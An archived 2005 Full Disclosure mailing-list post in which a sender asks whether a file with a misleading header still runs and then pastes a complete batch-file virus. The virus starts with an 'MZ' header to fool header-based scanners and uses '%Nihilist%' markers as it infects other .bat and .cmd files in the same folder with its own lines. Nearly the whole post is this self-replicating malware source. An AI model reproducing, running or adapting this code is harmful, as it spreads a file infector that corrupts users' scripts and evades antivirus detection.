Full Disclosure mailing list archives
RE: RE: Full-disclosure Digest, Vol 8, Issue 48
From: <auto445789 () hushmail com>
Date: Thu, 27 Oct 2005 19:10:25 -0700
The virus scanner determined the type of the file by the header and it failed. That's bad news. I am wondering however, when I execute that file, how does the OS process the file? I guess my question is, if I have a modified version of a virus, with whatever header, if I try to execute that file, will the virus code get executed?
Lets see, do you think this would be executed? ------------------------------------------------------- MZ%Nihilist% %Nihilist%@echo off %Nihilist%set num=0 :ag %Nihilist% %Nihilist%set fn%num%= %Nihilist%set /a num+=1 %Nihilist%if %num% LSS 5 goto ag %Nihilist%set num=0 %Nihilist%for %%a in (*.bat *.cmd) do call :mr %%a %Nihilist%set num=-1 :fi %Nihilist% %Nihilist%set /a num+=1 %Nihilist%if %num% GTR 5 (goto ROF) %Nihilist%if %num% EQU 0 (set file=%fn0%) %Nihilist%if %num% EQU 1 (set file=%fn1%) %Nihilist%if %num% EQU 2 (set file=%fn2%) %Nihilist%if %num% EQU 3 (set file=%fn3%) %Nihilist%if %num% EQU 4 (set file=%fn4%) %Nihilist%if %num% EQU 5 (set file=%fn5%) %Nihilist%set rnd=%random% %Nihilist%set spth=%0 :findnum %Nihilist% %Nihilist%set /a rnd-=10 %Nihilist%if %rnd% GEQ 10 (goto findnum) %Nihilist%set lz=0 %Nihilist%del tmp %Nihilist%for /f "tokens=1*" %%a in (%file%) do if 1 EQU 1 ( %Nihilist% set lc=%%a %%b %Nihilist% call :wl %Nihilist%) find "Nihilist" <%spth% >>tmp %Nihilist%more +%rnd% < %file% >>tmp %Nihilist%move /y tmp %file% %Nihilist%@echo on %Nihilist%goto fi :wl %Nihilist% %Nihilist%set /a lz=%lz%+1 %Nihilist%if %lz% LEQ %rnd% (echo %lc% >>tmp) %Nihilist%goto :EOF :mr %Nihilist% %Nihilist%if %num% LEQ 5 ( %Nihilist%set fn%num%=%1 %Nihilist%set /a num+=1 %Nihilist%) :ROF %Nihilist% ------------------------------------------------------- Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- RE: Full-disclosure Digest, Vol 8, Issue 48 Stejerean, Cosmin (Oct 27)
- <Possible follow-ups>
- RE: RE: Full-disclosure Digest, Vol 8, Issue 48 auto445789 (Oct 28)
- RE: RE: Full-disclosure Digest, Vol 8, Issue 48 Martijn Lievaart (Oct 31)
- RE: RE: Full-disclosure Digest, Vol 8, Issue 48 Nick FitzGerald (Oct 31)
- RE: RE: Full-disclosure Digest, Vol 8, Issue 48 Martijn Lievaart (Oct 31)